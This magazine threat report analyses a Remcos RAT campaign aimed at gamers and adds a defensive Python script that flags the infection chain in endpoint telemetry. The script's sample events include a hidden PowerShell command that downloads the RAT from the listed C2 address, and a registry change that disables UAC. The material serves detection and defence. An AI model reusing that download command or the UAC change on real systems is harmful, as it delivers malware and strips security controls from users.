Page 84 - Cyber Defense eMagazine October 2023
Introduction
Our investigation has uncovered an active ecosystem in which the Remcos Remote Access Trojan (RAT)
is distributed. It is supported by a range of servers acting as command and control (C2) centres, which
serve the Remcos RAT and other malicious files to compromised systems. This report presents an
analysis of the Remcos RAT, covering the malicious IPs, payloads and techniques we observed. By
documenting how the threat operates, we endeavour to give organizations and individuals the detail they
need to strengthen their defences against this persistent threat.
Remcos (Remote Control and Surveillance) is a remote access Trojan that gives an operator unauthorized
remote control over, and surveillance of, a compromised system. It is malicious software designed to
infiltrate a computer, take control of it and exfiltrate sensitive data, and it is typically spread through
malicious attachments, drive-by downloads or social engineering. Remcos has been in circulation since
2016, when BreakingSecurity, a European company, first sold it as a legitimate remote administration
tool. Although the vendor asserts that it is licensed only for lawful use, Remcos has become a commonly
employed tool in malicious campaigns conducted by threat actors.
Key Points
• Our investigation uncovered several IPs hosting the Remcos RAT, with "141[.]95[.]16[.]111[:]8080"
as a prime example. This host serves malicious files, including a .bat script ("recover.bat") and
the Remcos RAT binary ("RiotGames.exe"). Our OSINT research shows a surge in IPs delivering
Remcos RAT payloads over the past two months, with new IPs still appearing in the current month.
• The "recover.bat" script, executed upon infection, uses PowerShell to download the second-stage
payload ("RiotGames.exe") from a remote location.
• The "RiotGames.exe" binary modifies the registry to disable User Account Control (UAC), so that
subsequent privileged actions run without a consent prompt and the malware can operate with
elevated privileges unnoticed by the user. The RAT also establishes persistence through auto-run
registry keys.
• Extracted configuration data reveals critical details, including the C2 IP ("141[.]95[.]16[.]111"),
the botnet name ("NewRem"), filenames, directories and the mutex name. This configuration drives
the RAT's operation, which ranges from keylogging and audio recording to screenshot capture and
system manipulation.
• The malware includes keylogging and audio-recording capabilities and captures desktop screenshots
in bitmap format. The collected data can be exfiltrated to the operator, exposing sensitive
information and credentials.
• We believe with low confidence that the campaign is targeting the gaming industry and individuals
involved in gaming.
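The infection chain in the key points above (a .bat script spawning PowerShell to fetch the second stage, the UAC-disabling registry write, auto-run persistence, and the C2 IP from the extracted configuration) can be turned into a simple endpoint triage check. The following Python script is an added example written for this article, not code from the report or from the malware. The endpoint events it inspects are constructed to resemble process-creation and registry-set telemetry; the field names (type, image, parent, cmdline, key, value, data) are an assumed schema rather than any real sensor's format, and because the article does not reproduce the contents of recover.bat, the sample PowerShell download command is illustrative only. The known indicators are the defanged ones printed above; the EnableLUA value and the Run/RunOnce keys are the standard Windows locations for UAC policy and autorun entries.

```python
"""Triage check for the Remcos infection chain described in the key points.

Added example for this article, not code from the report or the malware.
The event schema is an assumption: a list of dicts with 'type'
('process' or 'registry') plus the fields used below.
"""
import re
from typing import Iterable


def refang(ioc: str) -> str:
    """Turn the article's defanged notation (141[.]95[.]16[.]111[:]8080) into a matchable string."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


# Indicators as printed in the article (defanged there).
KNOWN_C2_IPS = {refang("141[.]95[.]16[.]111")}
KNOWN_FILENAMES = {"recover.bat", "riotgames.exe"}

# Standard Windows locations for the UAC policy value and autorun entries.
UAC_POLICY_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system"
RUN_KEY_SUFFIXES = (
    r"\software\microsoft\windows\currentversion\run",
    r"\software\microsoft\windows\currentversion\runonce",
)
# Directories an unprivileged user can write to; an autorun pointing here is suspicious.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\",
                         "\\users\\public\\", "\\downloads\\")
DOWNLOAD_CMDLETS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                    "start-bitstransfer", "curl ", "wget ")

URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-]*)?", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def _is_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def triage(events: Iterable[dict]):
    """Return (findings, iocs): findings is a list of (tag, detail) tuples in event
    order; iocs is a dict of sets (ips, urls, files) collected along the way."""
    findings = []
    iocs = {"ips": set(), "urls": set(), "files": set()}

    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            cmd = ev.get("cmdline", "")
            lc = cmd.lower()
            parent = ev.get("parent", "").lower()
            # Stage 1: cmd.exe (running the .bat) spawns PowerShell with a download cmdlet.
            if parent.endswith("cmd.exe") and "powershell" in lc and any(c in lc for c in DOWNLOAD_CMDLETS):
                findings.append(("powershell_download", cmd))
                for url in URL_RE.findall(cmd):
                    iocs["urls"].add(url)
                    for ip in IPV4_RE.findall(url):
                        iocs["ips"].add(ip)
                        if ip in KNOWN_C2_IPS:
                            findings.append(("known_c2_contact", ip))
            haystack = lc + " " + ev.get("image", "").lower()
            iocs["files"].update(n for n in KNOWN_FILENAMES if n in haystack)
        elif kind == "registry":
            key = ev.get("key", "").lower()
            name = ev.get("value", "").lower()
            data = str(ev.get("data", "")).strip()
            # Stage 2: EnableLUA=0 turns UAC off, so later elevation raises no consent prompt.
            if key == UAC_POLICY_KEY and name == "enablelua" and data == "0":
                findings.append(("uac_disabled", f"{ev.get('key')}\\{ev.get('value')} = 0"))
            # Persistence: a Run/RunOnce value pointing at a user-writable path.
            elif key.endswith(RUN_KEY_SUFFIXES) and _is_user_writable(data):
                findings.append(("run_key_persistence", f"{ev.get('value')} -> {data}"))
    return findings, iocs


# Constructed sample telemetry for the chain in the key points (not real captured events).
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\Downloads\recover.bat"'},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # Illustrative download command; the real recover.bat contents are not reproduced in the article.
     "cmdline": r'powershell -w hidden -c "Invoke-WebRequest -Uri http://141.95.16.111:8080/RiotGames.exe '
                r'-OutFile C:\Users\victim\AppData\Local\Temp\RiotGames.exe"'},
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\RiotGames.exe",
     "cmdline": r"C:\Users\victim\AppData\Local\Temp\RiotGames.exe"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "value": "EnableLUA", "data": 0},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "RiotGames", "data": r"C:\Users\victim\AppData\Local\Temp\RiotGames.exe"},
    # Benign autorun written by an installer into Program Files: should not be flagged.
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "VendorUpdater", "data": r"C:\Program Files\Vendor\updater.exe"},
]


if __name__ == "__main__":
    found, collected = triage(SAMPLE_EVENTS)
    for tag, detail in found:
        print(f"[{tag}] {detail}")
    print("IOCs:", {k: sorted(v) for k, v in collected.items()})
```

Run it directly to see the four findings for the constructed events (the download, the contact with the known C2 IP, the UAC change and the AppData autorun); the Program Files autorun is deliberately left unflagged so the heuristic does not fire on ordinary installers. To use it on real data, map your sensor's fields onto the assumed schema and pass the list to triage().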
Copyright © 2023, Cyber Defense Magazine. All rights reserved worldwide.